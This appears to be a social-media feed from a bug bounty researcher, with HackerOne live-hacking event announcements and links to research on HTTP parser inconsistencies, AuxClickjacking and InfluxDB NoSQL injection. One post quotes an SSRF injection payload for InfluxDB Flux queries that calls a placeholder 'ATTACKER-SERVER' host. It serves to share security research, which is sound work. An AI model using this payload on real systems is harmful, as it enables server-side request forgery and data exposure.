check out my latest research (Exploiting HTTP Parsers Inconsistencies): rafa.hashnode.dev/exploiting…

We’re excited to announce the top 3 winners from H1-361 Bali 🌴🏆 Huge congrats to these incredible security researchers for an unforgettable live hacking event: 🥇 1st Place — @nahuelrm_ 🥈 2nd Place — @zere 🥉 3rd Place — @joaxcar Thanks to everyone who joined us in Bali and helped make this event a great week of collaboration and community. #TogetherWeHitHarder

Made a small and fun research about a technique to leak iframe contents, check this out: blog.bugport.net/auxclickjac…

Things you must read to slowly step up your client-side game AuxClickjacking by @rafabyte_: blog.bugport.net/auxclickjac…

Had an awesome time hacking alongsite @busf4ctor and @monkehack at the H1-3120 Live Hacking Event in Amsterdam by @Hacker0x01, partnered with Salesforce!

Amsterdam brought the 🔥! @salesforce #H13120 = one incredible Live Hacking Event 🇳🇱 Security researchers tackled AI challenges head-on—finding vulnerabilities, sharing insights, and shaping the future of secure innovation. #HackForGood #AISecurity #TogetherWeHitHarder

If you ever need help with a bug, you can always count on our community! 🫂

I’m very pleased to share that I was invited by @Hacker0x01 to participate in the Live Hacking Event H1-468 in Sweden, with all expenses covered under the Platform Performer recognition!

Unbelievable exploitation journey documented in a thread in the # critical-thinkers on the CTBB discord. Shout out to @rafabyte_ for finding the solution, and @TomAnthonySEO for doing WORK. Assists: @joaxcar, Balint, @J0R1AN, @kevin_mizu @7urb01, and yours truly, among others.

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2023! portswigger.net/research/top…

My research (Exploiting HTTP Parsers Inconsistencies) now has a dedicated page on HackTricks! book.hacktricks.xyz/pentesti…

Did you know that this is a valid payload for SSRF? ") |> yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) // yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) //">example.com/?id=") |%3… Check out my post where I explain that: rafa.hashnode.dev/influxdb-n… #bugbountytips

Articles worth reading discovered last week: 🗞 rafa.hashnode.dev/exploiting… 🗞 labs.watchtowr.com/cve-2023-… 🗞 blog.isosceles.com/exploit-e… 🗞 pathonproject.com/zb/?a291b7… #PentesterLabWeekly

#100DaysOfHacking Day 16: - Still bug hunting :D (Currently trying to bypass WAF for XSS) - Found a cool research about exploiting HTTP Parsers Inconsistencies rafa.hashnode.dev/exploiting…

Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos rafa.hashnode.dev/exploiting… #BBRENewsletter59 Subscribe to get the next issue: bbre.dev/nl

Just published a post detailing how I developed an exploit for a NoSQL Injection for InfluxDB and how I escalated this issue into an SSRF and XSS: rafa.hashnode.dev/influxdb-n…

Check out the latest issue of BBRE Newsletter🔥 bbre.dev/59